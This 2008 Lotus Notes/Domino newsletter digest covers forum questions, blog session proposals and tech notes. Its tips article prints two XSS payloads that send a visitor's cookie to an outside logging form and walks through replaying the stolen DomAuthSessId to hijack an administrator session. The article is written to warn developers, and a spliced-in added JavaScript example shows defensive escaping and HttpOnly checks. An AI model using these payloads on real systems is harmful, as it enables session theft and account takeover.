
Bulletin "Lotus Notes CodeStore"


Bulletin "Lotus Notes CodeStore" No 81 of 2008-09-26


Newsletter maintained by: Lotus Notes programmer Lotus Coder. Issue No 81 of 2008-09-26
A newsletter about programming in Lotus Notes/Domino
Discussions on forums and blogs. Code examples in LotusScript, @formula, Java


Bulletin "Lotus Notes CodeStore" Issue 13 of 21.04.2008

comp.soft.prog.lotuscodesrore

CodeStore. Code examples


Forums. Fresh topics and discussions

Try Domino 8.0.2
Good day
LT 8.x
I need to group mail messages by one field and sort them by another. How can this be implemented?
Thanks in advance.
Hello.
The question may be a silly one, but I can't get anywhere, and I have dug through the whole forum without finding anything like it.
I need to use LotusScript to assign the values of three Lotus names to the ReaderDos field (type Readers) in the QuerySave event of a new document.

I tried doing it like this
tmpText = "User1/org ; User2/org"
uidoc.FieldSetText("ReaderDos";tmpText)

The values are assigned to the Readers field, but these users do not see the document

I did it like this
tmpText = "User1/org" & Chr(10) & Chr(13) & "User2/org"
uidoc.FieldSetText("ReaderDos";tmpText)

and like this

uidoc.FieldAppendText("ReaderDos"; "User1/org")
uidoc.FieldAppendText("ReaderDos"; "User2/org")

Nothing helps. As I understand it, I am doing something completely wrong. Please help, I need this urgently..... Thank you

Maybe a slightly silly question, but still:
Deleting documents in mail works differently for different users: for some it is select, Delete, F9; for others it is just select, Delete.
Where is this configured? I have been looking for two days now
I apologize if something in my wording is incorrect, but I am a complete beginner (if not worse).

The situation is as follows. There are three domain names: site1, site2 and site3.
The actual "site" is site1, which is written in Lotus. The other two domain names are simply bound to the same IP address. As a result, search engines see the first site as the main one and the other two as its mirrors. That is bad. We cannot close the other two sites, because they also bring in some additional traffic.

On Apache there is a solution to this problem in the form of the so-called 301 redirect, which tells the search robot that the site has moved "permanently" to another address.

Is there a similar option for a permanent redirect from one domain to another in Lotus?

So far we have only managed to set up a 302 redirect, but it does not satisfy the search engines, because it is a temporary redirect, and the search robot still continues to index site2 and site3 and to treat them as mirrors.

WE REALLY NEED YOUR HELP!!!

Tips. Advice

Following on from yesterday's discussion about users editing hidden fields I want to discuss another danger and the reason I was thinking about the problem in the first place.

Let's forget about the consequence of the actual change to the field for a moment. Even if changing it has no adverse effect on the system itself there is another, potentially dangerous, problem. Cross-Site Scripting or XSS.

Maybe you've heard of XSS but dismissed it as something not worthy of attention. You really shouldn't dismiss it too easily though. What if I were to say I could easily use XSS to log in to your server as an administrator, or as any other user for that matter!? It's really easy to do!!

Let's assume you have a form that allows user-entered HTML. This can be either because you want them to (TinyMCE on top of a Rich Text field, for example) or because you don't strip HTML from fields where you don't want or expect it (the Title for example). Either way, if the user can enter HTML, they can then have a good go at hacking you.

As an example, imagine a user enters the following HTML into a field:

<script>document.write("<img src='http://extranet/xss.nsf/logcookie?
OpenForm&cookie="+document.cookie+"' />");</script>

Or even the following (which works in IE6) seemingly harmless-looking HTML:

<img src="javascript:location.href='http://extranet/xss.nsf/logcookie?
OpenForm&cookie='+document.cookie"/>

If either of the above (or the 1,000s of similar hacks) aren't properly filtered out then you could be in trouble!

If the above code was stored in a document and you opened it while logged in you'd reveal your authentication cookie's value to the hacker. They could also see your IP address and the URL you were logged in to.

To prove it works I actually tested it out. In the example above the form on the other server looked like this:

[Screenshot: Hacked1]

Note that the user would only see this if the <img> hack, of the two I showed above, was used. If the <script> hack was used the user wouldn't see this and would be completely unaware of the problem.

Even if they are aware, there's not much they can do. Even if they panic and close the browser, it's too late. Although closing the browser logs them off, the session still exists on the server, and if the hacker reproduces a cookie called DomAuthSessId with the value they now know, the hacker will be logged in as you! Your only hope is that the user has the wherewithal to ring and tell somebody who can quit the HTTP task on the server and not start it again until they've fixed the huge security hole.

To test it out I made it so that the LogCookie Form (see the above screenshot) would run a WebQueryOpen agent to email me the cookie value and the URL they were logged in to. Then all I did was:

  1. [Hacker]: Post one of the above snippets of HTML to a website where I knew (or hoped if I were an actual hacker) there was no filtering.
  2. [User]: Visit the site while logged in as an Administrator who knows nothing of the attack.
  3. [Hacker]: Wait at the other end for the email(s) to arrive.
  4. [Hacker]: Take one of the emails and click the link in it which points to the URL (HTTP_Referer) of the hacked page.
  5. The link opens Firefox at the problem Domino website. Imagine the first thing you see is a login screen (like below).
    [Screenshot: Hacked2]
  6. Even if I don't have a login for the site it doesn't matter. I can now bypass the login by adding a cookie (see above) using the Web Developer plugin.
  7. All I need to do is add a cookie called DomAuthSessId (case sensitive!) with the same value as the one that was emailed to me, like so, being sure to tick "Session cookie":
     [Screenshot: Hacked3]
  8. After pressing OK all I need to do is refresh the page and it will send the cookie to the server, which will then think I'm logged in as the user who just opened the hacked page. Instead of seeing the login page I'll see the application itself and be able to do everything that user is allowed to (including changing their password!).
  9. Even if the user has since logged out it doesn't matter, just as long as the hacker receives the email and creates the cookie before the session times out on the server!

Scarily easy! Note that I tested this from different servers and PCs. The server logging the cookie was different to the one hacked. The PC I logged in to with the stolen cookie was not the one I used to log in to when I visited the bad page and, so, had a different IP address. This is as real world a test as I could conjure up. Real enough to prove it's possible.

So then. This isn't one of my digs at Domino. This is a problem that affects all web server environments that use cookie-based authentication. I'm only showing how easy it is in the hope it will make you sit up and take notice of how serious XSS vulnerabilities can be.

Tomorrow I'll talk about a solution. That solution will be from an application perspective. As far as the server goes I can't see why Lotus don't tie a session to the IP the user logged in from. That and/or using the HttpOnly flag on the DomAuthSessId cookie, which would prevent JavaScript (and hence the hacker) from accessing it in most browsers.
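
Added example, not part of the original post: a JavaScript sketch of two defensive checks for the scenario above, encoding a field that should never contain markup and auditing a response's Set-Cookie values for a DomAuthSessId cookie without HttpOnly. The function names and sample values are constructed for illustration, and the Secure check goes beyond what the post mentions.

```javascript
// Added example (not from the original post). Function names are hypothetical.

// 1. Output encoding for fields that should never contain markup (e.g. Title).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// 2. Parse one Set-Cookie header value into name, value and attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || '';
  const eq = first.indexOf('=');
  if (eq < 1) return null; // not a name=value pair
  const attrs = {};
  for (const part of parts) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name: first.slice(0, eq).trim(), value: first.slice(eq + 1).trim(), attrs };
}

// Report what is missing on the session cookie in a list of Set-Cookie values.
// Cookie names are case sensitive; attribute names are not.
function auditSessionCookie(setCookieHeaders, cookieName = 'DomAuthSessId') {
  const findings = [];
  const cookies = setCookieHeaders.map(parseSetCookie).filter(Boolean);
  const matches = cookies.filter((c) => c.name === cookieName);
  if (matches.length === 0) {
    findings.push(`${cookieName}: not set in this response`);
  }
  for (const c of matches) {
    if (!c.attrs.httponly) {
      findings.push(`${cookieName}: missing HttpOnly (readable via document.cookie)`);
    }
    if (!c.attrs.secure) {
      findings.push(`${cookieName}: missing Secure (sent over plain HTTP)`);
    }
  }
  return findings;
}

// Constructed sample data, not captured from a real server.
const SAMPLE_WEAK = ['DomAuthSessId=0123456789ABCDEF0123456789ABCDEF; path=/'];
const SAMPLE_HARDENED = ['DomAuthSessId=0123456789ABCDEF0123456789ABCDEF; Path=/; Secure; HttpOnly'];
const SAMPLE_FIELD = '<script>document.write(document.cookie)</script>';

console.log(escapeHtml(SAMPLE_FIELD));            // rendered as text, not executed
console.log(auditSessionCookie(SAMPLE_WEAK));     // two findings
console.log(auditSessionCookie(SAMPLE_HARDENED)); // no findings
```

Encoding on output only suits fields where HTML is not expected; a field that deliberately accepts HTML needs an allow-list sanitizer instead.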


Get an introduction to DirLint, a new tool available in Lotus Notes Domino 8 that scans directories and identifies issues such as invalid syntax in names, issues with the naming hierarchy scheme, and reports problems in directory names.


Blogs. What people are discussing and writing

Author: Gordon Lee
Tags: websphereportal web2.0
Idea:
For as long as I remember, Ron Sebastian has been dazzling us with demos at the Lotusphere Opening General Session. This session is for those who want to go beyond the Green County or Renovations portals to see an actual Web 2.0 business application deployed and used within a corporate environment. The Practitioner Portal is designed for the 100,000 knowledge workers in IBM's GBS consulting practice, incorporating Lotus products such as Portal, Sametime, Connections, Quickr, Unyte, and Atlas. See how wikis, blogs, ratings, and social tags are used in conjunction with legacy applications to create a new Knowledge Sharing environment. Gordon Lee and members of his development team will describe what it took to put this solution together, from the technical components to the cultural and socialization challenges of introducing Web 2.0. Enjoy 60 minutes of real code with no smoke, no mirrors, no stubs, no deception, no bull, and can you believe this, no Powerpoints.

Author: Kevin Pettitt
Tags: OpenNTF Templates
Idea:
This is an update to the session that Bruce and I delivered at LS08, and it will include a bunch of updated content. We would be interested in any thoughts about what you might expect or like to see in this presentation, especially if you've seen earlier versions from Lotusphere, the VIEW, or ILUG. Of course, if you have some free templates you want to tell us about by all means speak up!
 
For a reference example, the slides from the ILUG08 edition are here
 
******* The Abstract ********
 
If you think the only application templates available for Notes are the ones that are bundled with it (and even if you already know better) it’s time you learned more about the many excellent free and open source Notes and Domino templates and where they come from. Join Kevin and Bruce for an updated and fast-paced look at some of the best templates from OpenNTF.org, trade publications, bloggers, and other little known sources. While it’s easy to build your own applications in Notes, it’s even easier, and usually more rewarding, to build on top of someone else’s. Whether you’re a developer, admin, or both, you’ll come away from this session ready to put these templates into action to become more productive, make your job easier, and impress your boss.

Author: Denny Russell
Tags: lotusphere2009 best-practices Email retention-policies
Idea:
This topic would cover all the details from building an email retention policy and what to consider when implementing a solution. Trying to figure out who, what and where are the biggest concerns when it comes to building your policy. Knowing and understanding your company's environment and under what rules and regulations they fall under is key.
 

Author: Andrew Pollack
Tags: linux domino administration session
Idea:
Linux can be an outstanding server platform for IBM Lotus Domino. Don’t let the geek factor keep you trapped on another platform. Even if you’ve never used Linux at all, you’ll come away with enough understanding to set up, maintain, and troubleshoot your Linux based Domino server. We’ll demystify the command line, the networking, the file system, the security, and the process management. When you get home, you’ll be ready to go.

Why?

The more servers that move away from the Windows platform and onto the Linux platform, the less customer sites Microsoft can leverage away with vendor lock-in. Many administrators continue to use Windows as the platform for their Domino servers for no reason other than comfort level with the platform. This session provides an easy step to extend that comfort level to another choice.

Author: Andrew Pollack
Tags: Domino Security Review
Idea:
Learn how to objectively and methodically evaluate the security practices and configuration in your IBM Lotus Domino environment. Think like a penetration tester and you’ll lower support costs, reduce risk, and keep the audit department happy. The session has technical, management, and business process focused details. Stop putting big new locks on rusty chains. Learn to think about security in a broad context from an expert.

Author: Andrew Pollack
Tags: registration password domino development
Idea:
Does your solution face the general public? In this session you’ll see how to provide a way for new users to establish login credentials and for existing users to request password reminders or change their passwords. It’s a tightly focused session, with plenty of time spent looking at specific programming code and techniques used to make the process as seamless and low maintenance as possible.

Why?

There’s been a great deal of focus on Domino in the corporate environment, but more and more customer facing sites want to use web 2.0 technologies to face the public. To do that, they need to authenticate users. This topic was requested on IdeaJam, and is something I've done several times on a large scale production basis. By focusing on a narrow topic, we can go into great depth and look at source code line by line in a session like this.

Author: Andrew Pollack
Tags: domino smtp spf adminstration
Idea:

Is managing your SMTP connectivity a trial and error process that feels like dabbling in the dark arts? Have you been accused of being an open relay or told your MX and PTR records don’t match? Do your users POP your IMAP when they try to connect from their cell phone? This session gives you the understanding of the world you’re connecting to. We’ll cover all those DNS topics from A to SPF, the difference between POP and IMAP, and how to make your Domino server speak to the rest of the world properly.

Why?

Most sessions on mail topics focus only on the Domino side of the equation. Domino administrators don’t always understand the rest of the picture well. By focusing on the core internet protocols that make mail routing possible, we’ll give admins the knowledge they need to run better systems. This session has a narrow focus designed to allow more depth and detail than usual.

Author: Andrew Pollack
Tags: domino http ssl configuration administration
Idea:

The HTTP task is powerful and complex. We’ll go through the configuration and show you how to make your server respond just the way you want. We’ll talk about virtual web sites, multi-homing, URL redirection, headers, and path substitution. Learn the step by step process of requesting and installing an SSL certificate, and how you can use more than one SSL certificate on the same server. Understand the differences between session and basic authentication, LTPATokens, LDAP based authentication, and integration with IIS. Come in confused, walk out an expert.

Why?

The top support request I get from experienced admins in the business partner community and from site administrators is about configuring SSL certificates. Knowledge of how the HTTP task actually works is extremely limited. By picking this narrow topic, we can go into very specific step by step detail and make sure people get their servers configured correctly.

Author: Tim Paque
Tags: HTML Table Rows
Idea:
Add Table Row attributes:
 
Currently Cells and Entire tables have tags for IDs, Rows do not.
Under "Row Tags" for the table, it only offers Name.
 
I often need to set Row attributes, but have to write the entire table in HTML because I haven't found a simple way to set row attributes on a domino generated table.
 
This makes hiding/showing a row with javascript MUCH more difficult.

Author: David Price
Tags: Domino Exchange migration merger ls09
Idea:
Acquisitions and mergers are a fact of life, now more than ever. You will come across a company with Outlook and Exchange at some point. Lotus Notes Release 8 can stand toe to toe with Outlook in regards to UI and Domino continues to tower over Exchange. That being said, the best technology doesn’t always win. You must actively campaign and educate the business. Learn what key tasks are needed at merger and at checkpoints along the way.

Finally benefit from my hard learned experience in migrating companies to Lotus from Exchange. Find out about resources such as IBM’s Project Liberate that can help you understand how expensive ‘free’ software can be. We will also touch on Sharepoint and why the free version (WSS) doesn’t scale and how expensive MOSS can be.

Finally learn how to size and budget for a migration in either direction. Presenting both migration options ensures that budget assumptions are accurate and that decisions are made with valid data.

Hope is not a plan; after this session you will be armed with facts, knowledge and experience.

Author: Chris Fickett
Tags: Connections iphone
Idea:
I would like to see a Connections mobile client for the Apple iPhone.  Similar to the Blackberry client.

Author: Chris Fickett
Tags: sametime iphone
Idea:
Build a Sametime client for the iPhone.

Author: Mike McGarel
Tags: domino design template
Idea:
You want to provide each of your client companies an extranet site with a custom look, features and functionality. But you want to avoid the maintenance nightmare of a multitude of database designs. This session will show you how to create a design template with the necessary flexibility to meet both goals. Techniques include the use of profile documents, subforms and style sheets. Slight variations for Notes/Domino versions 6, 7 and 8 will be examined.

Author: Adam Foster
Tags: Quickr design development code customisation lotus domino AJAX
Idea:
Sit back while we take you beyond the logo. Learn to: Find all the elements needed to customise Lotus Domino Quickr and how to centrally manage them across all your places. Dive into Custom themes, page layouts, forms, placebots, templates and custom CSS. Use Ajax to add Notes views to Quickr in 2 minutes, and Google Gadgets in 1 minute. DIY views of Quickr tasks, documents and folders. Customise My Places tabs and much more!

Author: Libby Ingrassia
Tags: ls09 best-practices Notes development project management
Idea:
I won't be giving this session, but two of my colleagues are planning to submit it:
Your choice of approach to Lotus development projects can signal success or failure. If you've ever had to document or inherit an application, and if you don't want to hear "I thought the application would do..." or "I expected it would be more like...," you need to make your Notes projects succeed using Notes tools, coupled with Project Management techniques, without sacrificing the benefits of Joint Application Design (JAD) & Rapid Application Development (RAD). JAD & RAD focus primarily on the design and development stages, but your approach needs to go beyond, and scale to both large and small scale applications. Take home Notes tools and best practices that let you manage your project from design through testing and documentation.

Author: Libby Ingrassia
Tags: ls09 domino administration
Idea:
I've been working on this one as a technical follow-up to my long-ago session with Ed on Selling Notes Internally. The connection is that an unhealthy environment is one of the big causes of complaints and negativity against Notes. The healthy environment can better withstand competition and can support further investment...
 
Whether users complain about poor Notes performance (and we know where that leads), you inherit an environment, or you're a new administrator wanting confidence in your choices, this session is for you. A health check that follows an organized method for auditing the servers, including Domino Directory, server configuration, and security, can lead to consolidations, upgrades, and improvements to performance, security, and manageability of your environment. Want Notes to be loved and you cast as the hero(ine)? Take home a checklist to guide your own audits, best practice settings, and configurations to compare with what you find. Prioritize based on urgency and complexity to keep Notes running smoothly and serving the business.


Articles and Documentation

When attaching a file to a rich text field in Lotus Notes 7 on a PPC Macintosh OS X machine from a Win32 file share, you receive a "File does not exist: <network path to file>" error and the file is not attached.
Starting in Notes 8.0.1, a new tab is presented within mail preferences. This tab allows the setting of Sametime Unyte preferences to be used with any associated mail or calendar activities. You have not setup the Sametime Unyte facilities within your environment and, to avoid confusion, you want to disable or hide display of this tab, and want to disable this tab. Is it possible to disable or hide the display of the Sametime Unyte tab in Lotus Notes? Presently, there is no means through a Domino policy t
This error occurs if a predefined context sensitive toolbar (such as Navigate View, Read Document, Edit Document, etc.) is not present in the outline in bookmark.nsf where toolbar data is stored. This indicates a corrupt bookmark database
Is it possible to disable embedded conversation twistie in email messages?
When opening a mail database, the title of the database is missing, and you simply see " - Inbox" instead of "User Name - Inbox"
How can you find out which tasks are listening in on which ports?
The Availability option, "Limit how far in advance a room/resource can be reserved" is not working properly. The room and resource is set to "Limit by days - Number of days -90." Users are not able to reserve the room after 7 weeks.
A Domino® 8.0.x server crashed while an administrator was attempting to upgrade a user's mail database template to a company's custom mail 8.0.x template.
Chair sends an invite to one invitee and that one invitee receives invitation but his name is listed in BCC field instead of Required To. As a result, the invitation does not have a Respond button.
How can you get your Notes Client to remember your sort preference when browsing in a folder?
